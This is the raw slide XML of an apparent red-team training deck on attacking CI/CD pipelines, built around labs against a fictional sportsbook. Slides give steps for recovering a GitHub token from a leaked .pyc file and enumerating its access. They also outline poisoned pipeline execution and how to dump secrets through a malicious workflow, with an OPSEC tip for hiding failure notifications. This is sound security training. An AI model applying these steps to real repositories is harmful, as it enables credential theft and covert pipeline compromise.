            <a:off x="4509162" y="-654474"/>
            <a:ext cx="10372410" cy="3752926"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10372410" h="3752926">
                <a:moveTo>
                  <a:pt x="0" y="3752926"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10372409" y="3752926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10372409" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3752926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9955175" flipV="1">
            <a:off x="1734305" y="8697504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B3BD47-FB6F-C15F-E7CD-E2B82D4C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8BA4E0-A2E7-C88C-8FEA-53075FE79C70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C8C6A267-78AB-A9D1-CB13-730DB505E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226119"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-129120" y="9278691"/>
          <a:ext cx="8292390" cy="697675"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="8292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409">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="345438" lvl="1" indent="0" algn="ctr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https://github.com/danielmiessler/fabric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endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:latin typeface="Telegraf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304799" y="235590"/>
            <a:ext cx="13944601" cy="2014526"/>
            <a:chOff x="0" y="57151"/>
            <a:chExt cx="9042399" cy="5564291"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="57151"/>
              <a:ext cx="9042399" cy="55642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78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Red Blue Purple AI / fabric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3170188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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5497916" y="129950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AB30921-52F7-4B46-ADAD-CF5BCE7B29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4670" y="2414303"/>
            <a:ext cx="11582400" cy="6356454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="44000"/>
              </a:srgb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BF743-635B-9932-7805-DAFE184C5D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530" y="2044939"/>
            <a:ext cx="9184265" cy="7095182"/>
          </a:xfrm>
          <a:prstGeom prst="snip2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="65397"/>
              </a:srgbClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic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57646045-6100-71FC-A6CD-59D23B4AF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998"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9718304" y="9295166"/>
          <a:ext cx="6422156" cy="697675"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="6422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409">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="345438" lvl="1" indent="0" algn="ctr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https://rbpai.net/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endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:latin typeface="Telegraf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925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028700" y="3078063"/>
            <a:ext cx="7414512" cy="4190760"/>
            <a:chOff x="0" y="66675"/>
            <a:chExt cx="9886015" cy="55876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75"/>
              <a:ext cx="9243864" cy="3099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4E7E7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Lab 01</a:t>
              </a:r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315300" y="3913855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528662"/>
              <a:ext cx="9886015" cy="11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SCM initial access</a:t>
              </a:r>
            </a:p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Situational awareness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2402430-C3C7-892B-E6BF-ED64A51F40ED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7C17BDE4-B80A-3244-F05B-0FA0C43FA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58098"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6324601" y="1047270"/>
          <a:ext cx="11472470" cy="3870960"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1147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4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Scenario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Target: Sharp Bets LLC, an online sportsbook. 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OSINT revealed a presence on public GitHub (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="28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sharpbets</a:t>
                      </a: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)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36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4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Lab Objectives</a:t>
                      </a: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Extract GitHub API token from a binary file</a:t>
                      </a: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Understand more about our compromised user’s access</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="18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Freeform 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{835F3CB6-156E-18F3-71E2-1842F3BA2CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="853692">
            <a:off x="-5984826" y="6964265"/>
            <a:ext cx="12348139" cy="10035669"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12348139" h="10035669">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12348140" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12348140" y="10035670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10035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7782E26E-CE21-A823-5CF5-86ABD51B85C6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149CE914-CA0A-B122-E1E2-9CA16EC9B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6060911"/>
            <a:ext cx="3566410" cy="356641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9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01: Initial Access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06105"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881990" cy="6492240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="8440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0995">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2779096771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1) Browse to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https://github.com/sharpbets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, find public repositories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Download these slides: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https://github.com/sharpbets/materials/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="240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slides/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2) Download/inspect leftover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__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pycache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__/repo_list.cpython-38.pyc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file in ‘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-app-dev’ repo</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1259838" marR="0" lvl="2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Decompile and recover GitHub PAT for Sharp Bets developer (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-joe)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1717038" marR="0" lvl="3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CLI:  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uncompyle6 repo_list.cpython-38.pyc</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1717038" marR="0" lvl="3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Online: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https://www.toolnb.com/tools-lang-en/pyc.html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1259838" marR="0" lvl="2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endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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DE7EF49-33CB-3D0E-D965-475B71AC30B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1" r="28708"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9270925" y="2636045"/>
            <a:ext cx="8082998" cy="726592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3DC20AD0-9ED5-C078-87EE-0F69D8C2549C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9963150" y="6995160"/>
            <a:ext cx="3981450" cy="3048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988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01: Initial Access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556225"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="7680960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For each of the following curl commands, use the following syntax:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="802638" marR="0" lvl="1" indent="-4572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export GH_TOKEN=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ghp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_&lt;token&gt;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curl –s –v -L -H "Accept: application/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vnd.github+json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" -H "Authorization: Bearer $GH_TOKEN" -H "X-GitHub-Api-Version: 2022-11-28" &lt;URL&gt;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3) Who does the token belong to? What are my token scopes? (For scopes, check for the ‘x-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oauth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-scopes’ header in the response)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URL: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https://api.github.com/user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4) What organizations is the user a member of, and what is their access level?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URL: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https://api.github.com/user/memberships/orgs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 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5) What repos do I have access to?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URL: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https://api.github.com/user/repos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Easy mode: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gato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(https://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github.com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/praetorian-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inc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/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gato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):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export GH_TOKEN=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ghp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_&lt;token&gt;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gato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-s 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enum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-v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710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961599" y="-2782197"/>
            <a:ext cx="11098426" cy="16596766"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11098426" h="16596766">
                <a:moveTo>
                  <a:pt x="11098426" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16596766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11098426" y="16596766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28700" y="3078063"/>
            <a:ext cx="7414512" cy="4626777"/>
            <a:chOff x="0" y="66675"/>
            <a:chExt cx="9886015" cy="616903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75"/>
              <a:ext cx="9243864" cy="3099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Continuous Integration</a:t>
              </a:r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315300" y="3913855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528662"/>
              <a:ext cx="9886015" cy="1707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Build Systems</a:t>
              </a:r>
            </a:p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Poisoned Pipeline Execution</a:t>
              </a:r>
            </a:p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CI Secrets</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48132" name="Picture 4" descr="Implementing a simple Python CI/CD pipeline using Github Actions – part 1.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10992EA0-C912-8F30-5F31-54EAB3AAC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5" t="21997" r="39023" b="33002"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10326403" y="2260385"/>
            <a:ext cx="2862072" cy="28620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402430-C3C7-892B-E6BF-ED64A51F40ED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8134" name="Picture 6" descr="Writing your first pipeline using GitLab CI/CD | by ag | Medium">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAE62BC6-BA78-0B94-B393-A1E772982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4" t="40957" r="48994" b="21809"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="13825728" y="2260385"/>
            <a:ext cx="2862072" cy="28620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4" descr="Jenkins Logo PNG vector in SVG, PDF, AI, CDR format">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DEAAD5A-F6D3-EB10-C10F-3E6E0FB84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8" r="18408" b="15814"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12079776" y="5535236"/>
            <a:ext cx="2862072" cy="28620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108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Building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646250"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="8138160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All-in-one vs. Component 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All-in-one: GitLab CI/CD, GitHub Actions,  Azure DevOps Pipelines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Component: Jenkins,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CircleCI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, TeamCity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Often has keys to the kingdom because it integrates everywhere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Also means it often bypasses network segmentation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Example – the Jenkins attack surface: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Stored &amp; plugin credentials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Build logs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Pipeline parameters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Workspaces to find private repos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Offline decryption of Jenkins backup (go-decrypt-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jenkins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)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User/group enumeration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Credential verification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Tool: Jenkins Attack Framework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https://github.com/Accenture/jenkins-attack-framework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Accompanying blog post describing capabilities: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https://medium.com/nerd-for-tech/jenkins-attack-framework-40b7ce628e78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 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BFE5E924-5A1F-676C-88DD-EF860B5B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348882"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="11066036" y="2447925"/>
          <a:ext cx="6193264" cy="482600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="298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5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921">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r">
                        <a:lnSpc>
                          <a:spcPts val="3839"/>
                        </a:lnSpc>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3199" dirty="0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CI</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="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ts val="3839"/>
                        </a:lnSpc>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3199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It’s a target-rich environment.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100"/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CF67D-43D5-8220-61E1-D754A2EE1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276" y="3690857"/>
            <a:ext cx="1802167" cy="248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87F608A-9C31-D556-D56A-77819C139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880" y="3769062"/>
            <a:ext cx="2331720" cy="233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Atlassian bamboo logo - Social media &amp; Logos Icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EB6455F-0C11-9BEE-DA46-26C46E960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513" y="6319921"/>
            <a:ext cx="2252579" cy="225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468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09128"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="80128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32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Direct PPE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Compromise access to source code (Creds/SSH/Token), modify build definitions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Feature branch workflows, dump secrets or get code execution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3200" b="1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32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Indirect PPE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Modify files referenced by build definitions (e.g. external build servers)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Jenkins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GitHub Action chaining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3200" b="1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32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Public PPE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External user getting code execution within a pipeline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Fork &amp; Pull Request with vulnerable triggers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Pwn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Requests (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pull_request_target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) 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Command/expression injection via event variables</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="16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Bishop Fox blog: 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https://bishopfox.com/blog/poisoned-pipeline-attack-execution-a-look-at-ci-cd-environments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BFE5E924-5A1F-676C-88DD-EF860B5B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693310"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="11066036" y="2447925"/>
          <a:ext cx="6193264" cy="482600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="298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5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921">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r">
                        <a:lnSpc>
                          <a:spcPts val="3839"/>
                        </a:lnSpc>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3199" dirty="0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PPE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="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ts val="3839"/>
                        </a:lnSpc>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3199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It’s a target-rich environment.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100"/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16581" y="1095375"/>
            <a:ext cx="15942719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Poisoned Pipeline Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3659071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GitHub Actions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265279" y="8430683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563239"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="29836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4921">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/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GitHub’s CI/CD solution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Build systems that execute workflows based on triggers (e.g.,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pull_request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,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issue_comment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)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Workflows can be submitted by any repository contributor (and on forks!)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User/Token scopes dictate permissions within orgs and repos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Reside in repo at: .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github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/workflows/$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name.yml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284BDBAA-7E47-3BBB-3EBF-DD3494F35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459045"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="112455" y="5131625"/>
          <a:ext cx="18063090" cy="3898075"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="9031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545">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3288026172"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2495452">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="345438" lvl="1" indent="0" algn="ctr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32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SaaS Runners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Hosted by GitHub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Ephemeral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Isolated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Build images maintained by GitHub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5438" lvl="1" indent="0" algn="ctr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32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Self-Hosted Runners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Host yourself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May not be ephemeral (default)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Probably not isolated (high LOE)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Likely using outdated OS (whole thing)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Potentially EDR/AV? (LOLBAS/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GTOFBin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/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RoR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)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Should never be used for a public repo (GitHub)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626" name="Picture 2" descr="@actions">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDD95FD2-7846-4120-9FDA-6E3E64258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5200" y="2484834"/>
            <a:ext cx="2168312" cy="216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781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3692">
            <a:off x="-2092563" y="5494437"/>
            <a:ext cx="12348139" cy="10035669"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12348139" h="10035669">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12348140" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12348140" y="10035670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10035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71563"/>
            <a:ext cx="6690444" cy="5305685"/>
            <a:chOff x="0" y="57150"/>
            <a:chExt cx="8920591" cy="7074245"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="57150"/>
              <a:ext cx="8920591" cy="1527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780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About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17568"/>
              <a:ext cx="8920591" cy="4613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Accenture Security, FusionX Red Team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AdSims</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="24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 Fortune 100</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3359"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="24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DevOps Workshops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Cons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Clients</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3359"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="24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Training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Black Hat EU 2-day training</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="259080" lvl="1" algn="l">
                <a:lnSpc>
                  <a:spcPts val="3359"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="24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    “Attacking DevOps Pipelines” (debut!)</a:t>
              </a:r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0" y="1849388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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5497916" y="129950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018154"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="11009888" y="1764415"/>
          <a:ext cx="6787182" cy="7493885"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2641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5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49698"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Tom Porter</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPts val="3120"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600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@porterhau5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ACCENTURE, FUSIONX RED TEAM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4792">
                <a:tc gridSpan="2"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endParaRPr lang="en-US" sz="1100" dirty="0"/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ADVERSARY SIMULATION</a:t>
                      </a:r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PENETRATION TESTING</a:t>
                      </a:r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CLOUD &amp; DEVOPS</a:t>
                      </a:r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BASEBALL</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="2799"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1999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algn="just">
                        <a:lnSpc>
                          <a:spcPts val="2799"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1999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ADVERSARY SIMULATION</a:t>
                      </a:r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PENETRATION TESTING</a:t>
                      </a:r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CLOUD &amp; DEVOPS</a:t>
                      </a:r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BASEBALL</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just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algn="just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2965"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Colbert Zhu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ACCENTURE, FUSIONX RED TEAM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6430">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/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APPLICATION/NETWORK PENETRATION TESTING</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/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RED TEAMING</a:t>
                      </a:r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FANTASY BASEBALL SPREADSHEET ENTHUSIAST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APPLICATION/NETWORK PENETRATION TESTING</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100"/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Red Teaming</a:t>
                      </a:r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Fantasy Baseball Spreadsheet Enthusiast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AutoShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11009888" y="176441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11009888" y="3207412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11009888" y="6961821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5EFAB6-A6CF-2C4B-B423-A01646C411D7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9805797-5A12-5BAE-DB30-287014953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881" y="1859633"/>
            <a:ext cx="2184722" cy="259092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2E201198-ADFF-EA6B-4C94-71BDDC26C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" r="-1288"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8442881" y="6377248"/>
            <a:ext cx="2184722" cy="259636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460BEA98-898D-C53C-CF4F-A7EE1D731E7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="9220283"/>
            <a:ext cx="3177688" cy="563420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3177688" h="563420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3177688" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3177688" y="563420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5634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GitLab CI/CD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142870"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="80128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GitLab Runners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Executors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Docker, Kubernetes, Shell, SSH, and more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Which branches are configured for a CI/CD pipeline?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Different branches may have different pipelines files/protections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Have an on-prem GitLab account?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Create your own private repo, setup CI/CD, look for available runners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Build definition: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.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gitlab-ci.yml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Configuration file defining the order of tasks a GitLab Runner performs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Compile an application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Perform unit tests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Run static analysis tools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Retrieve secret from password vault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Built-in modules for common tasks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Can also execute script commands (e.g., Bash, PowerShell)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602" name="Picture 2" descr="GitLab for CI/CD | Server Management Tips">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A549DB99-F722-867E-6477-D4DA68E163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6" r="23414" b="4793"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="13434727" y="4267199"/>
            <a:ext cx="3749040" cy="292608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842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033485"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881990" cy="6507920"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="8440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0995">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2329804865"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="6507920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YAML files (.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github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/workflows/ in repo)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Basic structure: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Name (to identify the workflow)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Triggers (events: push,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pull_request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, etc.)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Environments (deployments)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Jobs (workload isolation, executes steps)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Steps (actions to perform, env vars)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Good intro to Actions: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https://gist.github.com/br3ndonland/f9c753eb27381f97336aa21b8d932be6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F0000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4AE51-22FB-4F6C-45CE-6B88F31D04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1809" y="3228974"/>
            <a:ext cx="8844311" cy="5868655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="68237"/>
              </a:srgbClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic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GitHub Workflow Files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3826614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GitHub Secrets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80128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4921">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/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Secrets can exist at several different levels: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Organization – accessible by Org admins and by Org repos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Repository – accessible to workflows in repo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Environment – accessible to workflows targeting a specific environment, have met environment criteria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If PAT has ‘repo’ and ‘workflow’ scopes and write access to an Organization’s repository, can dump secrets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No self-hosted runner needed!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Cannot be done from personal fork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Process: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Create branch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Push malicious workflow the references secrets from the “secrets context”, e.g.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{{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secrets.NAME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}}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Execute, retrieve/receive output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Delete branch, workflow, and deployments if necessary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OPSEC: If your run fails, then the PAT owner gets notified (email, in-app mail) by default! Can delete the failed run and the in-app mail notification will disappear.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Other secret dumping techniques include template injection for file/process abuse and memory scraping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https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/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054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028700" y="3078063"/>
            <a:ext cx="7414512" cy="4190760"/>
            <a:chOff x="0" y="66675"/>
            <a:chExt cx="9886015" cy="55876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75"/>
              <a:ext cx="9243864" cy="3099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4E7E7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Lab 02</a:t>
              </a:r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315300" y="3913855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528662"/>
              <a:ext cx="9886015" cy="11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Secret identification</a:t>
              </a:r>
            </a:p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Secret extraction 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4E7E7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2402430-C3C7-892B-E6BF-ED64A51F40ED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7C17BDE4-B80A-3244-F05B-0FA0C43FA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196882"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6324601" y="1047270"/>
          <a:ext cx="11472470" cy="4419600"/>
        </p:xfrm>
        <a:graphic>
